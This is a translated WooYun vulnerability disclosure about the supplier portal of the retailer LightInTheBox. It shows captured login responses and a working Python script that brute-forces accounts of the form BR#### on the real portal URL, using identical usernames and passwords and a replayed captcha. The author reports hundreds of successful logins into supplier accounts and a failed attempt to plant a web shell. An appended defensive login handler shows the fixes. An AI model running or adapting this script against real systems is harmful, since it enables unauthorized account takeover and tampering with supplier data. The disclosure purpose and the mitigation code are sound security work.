WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles online -------- http://drop.zone.ci/
2015-12-22: Details reported to the vendor, awaiting vendor processing
2015-12-24: Vendor has confirmed; details disclosed to the vendor only
2016-01-03: Details disclosed to core white hats and relevant domain experts
2016-01-13: Details disclosed to regular white hats
2016-01-23: Details disclosed to intern white hats
2016-02-07: Details disclosed to the public
Supplier information leak; the website design has problems
On LightInTheBox (兰亭集势) I happened to come across an account whose username and password were identical. Looking at the site, it could be enumerated: once the captcha request is intercepted, the same captcha can be reused for a limited time window. Taking BR1100 as an example, the first two letters stay the same and the trailing digits can be enumerated. For an account/password pair that logs in correctly there are two kinds of responses:
HTTP/1.1 200 OK
Server: nginx/1.4.3
Date: Sun, 20 Dec 2015 13:17:18 GMT
Content-Type: application/json;charset=UTF-8
Connection: keep-alive
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Set-Cookie: rememberMe=deleteMe; Path=/; Max-Age=0; Expires=Sat, 19-Dec-2015 13:17:18 GMT
Content-Length: 75

{"success":true,"detail":"登录成功！","data":"/merchant/settled/home"}
The response above means the login succeeds but then lands on a 404 error; BR1102 is an example of this case. A correct login response looks like this:
HTTP/1.1 200 OK
Server: nginx/1.4.3
Date: Sun, 20 Dec 2015 13:21:44 GMT
Content-Type: application/json;charset=UTF-8
Connection: keep-alive
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Set-Cookie: rememberMe=deleteMe; Path=/; Max-Age=0; Expires=Sat, 19-Dec-2015 13:21:44 GMT
Content-Length: 61

{"success":true,"detail":"登录成功！","data":"/welcome"}
Then, since I am not very familiar with Burp Suite, I went with Python, as follows:
import requests
import re
import json

s = requests.Session()
header = {
    "Host": "supplierportal.litb-inc.com",
    "User-Agent": "Mozilla/5.0 (X11; Linux i686; rv:17.0) Gecko/20100101 Firefox/42.0",
    "Accept": "*/*",
    "Accept-Language": "en-US,en;q=0.5",
    "Accept-Encoding": "gzip, deflate",
    "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
    "X-Requested-With": "XMLHttpRequest",
    "Referer": "http://supplierportal.litb-inc.com/metis",
    "Content-Length": "41",
    "Cookie": "JSESSIONID=FCB45F6A027EBB036330D22D1C295084; org.springframework.web.servlet.i18n.CookieLocaleResolver.LOCALE=zh; action-message=null",
    "Connection": "keep-alive",
    "Pragma": "no-cache",
    "Cache-Control": "no-cache",
}

if __name__ == "__main__":
    # Output file for the account numbers that returned a /welcome login.
    f = open('/Users/xxxx/webtest/lan', 'w+')
    for i in range(1000, 9999):
        u = '%04d' % i
        # Username and password are identical; the same captcha value is reused.
        payload = {"email": 'BR' + u, "password": "BR" + u, "captcha": "kf2x"}
        response = s.post(url="http://supplierportal.litb-inc.com/metis/login", data=payload, headers=header)
        # with open('/Users/xxx/webtest/lanting', 'w+') as f:
        if response.json().get('success') and response.json().get('data') == '/welcome':
            f.write(u + '\n')
    f.close()
With the first two letters fixed, the numbers enumerated at the back are the ones that can log in. This is the four-digit case; the five-digit case works as well.
This is the case of the BR1111/BR1111 account. In the four-digit case I ran 309 accounts, and in the five-digit case 455, without finishing. The merchant backend can modify product images and prices (this seems to require manual review), as well as the contact persons, phone numbers, etc. of the various suppliers. I tried uploading an image through the backend, but Chopper (菜刀) could not connect; the image upload requires 500*500, but after upload it becomes 200*200. I am not familiar with this, so I did not continue.
The captcha's validity handling has a problem, and the default account password is identical to the account name; these need to be changed. (I don't really understand this; I'm just saying it off the cuff.)
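The two server-side checks whose absence the report above describes are a captcha that is single-use and time-limited, and a policy that does not let an account keep a password equal to its name. The following is an added example of a login handler with those checks, written for this page and not the portal's own code; the `LoginService` class, the TTL and attempt limits, the `/change-password` redirect and the user map are all assumptions.

```python
import secrets
import time
from collections import defaultdict

CAPTCHA_TTL = 120     # seconds a captcha stays valid (assumed value)
MAX_ATTEMPTS = 5      # failed logins per session before lockout (assumed value)


class LoginService:
    """Hypothetical login handler; `users` is a constructed {email: password} map."""

    def __init__(self, users, clock=time.time):
        self.users = users
        self.clock = clock
        self.captchas = {}                # session -> (code, issued_at)
        self.failures = defaultdict(int)  # session -> consecutive failures

    def issue_captcha(self, session):
        # One fresh code per session; issuing a new one replaces the old one.
        code = secrets.token_hex(2)
        self.captchas[session] = (code, self.clock())
        return code

    def login(self, session, email, password, captcha):
        if self.failures[session] >= MAX_ATTEMPTS:
            return {"success": False, "detail": "too many attempts"}
        # pop() makes the captcha single-use: a replayed code finds nothing.
        entry = self.captchas.pop(session, None)
        if (entry is None
                or not secrets.compare_digest(entry[0].encode(), captcha.encode())
                or self.clock() - entry[1] > CAPTCHA_TTL):
            self.failures[session] += 1
            return {"success": False, "detail": "captcha invalid or expired"}
        expected = self.users.get(email)
        if expected is None or not secrets.compare_digest(expected.encode(), password.encode()):
            self.failures[session] += 1
            # Same message for unknown user and wrong password, so nothing leaks.
            return {"success": False, "detail": "bad credentials"}
        self.failures[session] = 0
        if password == email:
            # Default credentials (password == account name) must be rotated first.
            return {"success": True, "data": "/change-password"}
        return {"success": True, "data": "/welcome"}
```

In a real deployment `users` would hold password hashes and the captcha and failure state would live in a shared store rather than in memory.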
Severity: Medium
Vulnerability Rank: 5
Confirmation time: 2015-12-24 18:28
This vulnerability lets users manipulate supplier data and could cause data corruption.
None for now